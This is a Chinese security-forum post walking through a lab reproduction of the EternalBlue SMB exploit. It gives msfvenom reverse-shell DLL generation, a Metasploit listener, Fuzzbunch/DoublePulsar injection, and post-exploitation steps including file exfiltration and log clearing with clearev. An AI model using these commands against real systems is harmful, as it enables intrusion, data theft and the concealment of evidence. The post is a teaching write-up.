首页
社区
课程
招聘
[原创]漏洞之永恒之蓝(简单复现)
发表于: 2018-11-26 20:21 10483

[原创]漏洞之永恒之蓝(简单复现)

2018-11-26 20:21
10483

1.漏洞描述

2.漏洞影响

1.环境搭建

2.windows7(32)攻击机工具安装及配置

Shadow Brokers工具包:https://github.com/misterch0c/shadowbroker

Python2.6 工具直接安装即可;Pywin32的安装需要以管理员权限执行;Shadowbrokers-master直接解压到指定目录,同时修改FuzzyBunch.xml文件内容,设置相应的ResourceDir和LogDir参数值,修改结果如下图所示:

3.Kali下生成木马程序

/> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.43.89 LPORT=5555 -f dll > systemSet.dll

4.使用Kali开启msfpayload监听

1.开启msfconsole

/> cd /usr/share/metasploit-framework
/> msfconsole

2.设置开启监听

/> use exploit/multi/handler
/> set payload windows/x64/meterpreter/reverse_tcp
/> set LHOST 192.168.43.89
/> set LPORT 5555
/> exploit

5.Fuzzbunch基本配置

1.生成后,将dll文件拷贝到攻击机C盘的根目录下,运行windows中的fb.py,并将其中的第72行注释掉;利用 EternalBlue 攻击受害系统,成功后使用 Doublepulsa 将刚刚生成的木马,远程注入受害系统中,从控制机上控制受害机;在使用 Fuzzbunch 时需要做些配置,如以下示图:(除特殊说明外,其它配置保持默认即可)

2.需要设置的有攻击IP地址:192.168.43.28(受害机), 回调地址192.168.43.198(攻击机),关闭重定向,设置日志路径,新建或选择一个project其他默认即可

3.输入命令开启永恒之蓝开始攻击use ETERNALBLUE

依次填入相关参数,超时时间等默认参数可直接回车,需要注意的就是选择被攻击方的操作系统目标系统信息。以及攻击模式选择FB

4.运行插件,看到 Eternalblue Succeeded 攻击成功

5.使用 Doublepulsar,把刚刚生成的木马注入到受害系统中use Doublepulasr;一路回车,需要注意的是选择目标操作系统架构,系统后门的执行方式选择 Rundll

填写刚刚生成木马文件的路径

Doublepulsar Succeeded ,已经成功把dll木马注入到受操控的系统中。攻击机的使命到此结束

6.返回到控制机,已链接

1.sysinfo查看靶机的基本信息

2.screenshot截取被控制端电脑的屏幕看看

3.shell获取被控制系统的shell,就是像在你电脑上运行cmd一样,任何命令都可以执行,最高权限,被控制端上没有任何的提示。可以cmd rar 把被控制端上看着有用的文件给加密压缩……能做到很多,上传,下载文件,执行文件

4.clearev清理掉痕迹,清理被控制端的日志

“永恒之蓝”会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序

紧急临时解决办法:https://www.cnblogs.com/qiyeboy/p/6848935.html

 

/> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.43.89 LPORT=5555 -f dll > systemSet.dll

  • 说明:-p 指定攻击载荷,LHOST指定监听地址,LPORT指定监听端口,-f 指定木马程序格式为dll,> 指定生成木马程序的保存路径,systemSet.dll表示木马程序保存在当前目录下,我们可以通过ls查看

/> cd /usr/share/metasploit-framework
/> msfconsole

/> use exploit/multi/handler
/> set payload windows/x64/meterpreter/reverse_tcp
/> set LHOST 192.168.43.89
/> set LPORT 5555
/> exploit

  • Eternalblue通过 TCP 端口445139来利用SMBv1NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的windows机器,无需用户任何操作,只要开机上网,就能在电脑中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序
  • 目前已知受影响的windows版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 4
支持
分享
最新回复 (8)
雪    币: 300
活跃值: (2477)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
mark
2018-11-26 21:00
1
雪    币: 2575
活跃值: (502)
能力值: ( LV2,RANK:85 )
在线值:
发帖
回帖
粉丝
3
学习了
2018-11-26 21:56
1
雪    币: 917
活跃值: (70)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
4
只是一些操作
2018-11-26 22:45
1
雪    币: 917
活跃值: (70)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
5
wyfe 学习了
只是一些操作
2018-11-26 22:48
0
雪    币: 7625
活跃值: (2709)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
6
只有我看见靶机中的工具箱了嘛?
2018-11-27 09:09
1
雪    币: 917
活跃值: (70)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
7
pghuanghui 只有我看见靶机中的工具箱了嘛?[em_41]
2018-11-27 09:41
0
雪    币: 26185
活跃值: (63307)
能力值: (RANK:135 )
在线值:
发帖
回帖
粉丝
8
感谢分享!
2018-11-27 18:21
0
雪    币: 615
活跃值: (590)
能力值: ( LV4,RANK:40 )
在线值:
发帖
回帖
粉丝
9
照着做了一遍,靠谱
2019-1-4 20:04
0
游客
登录 | 注册 方可回帖
返回
//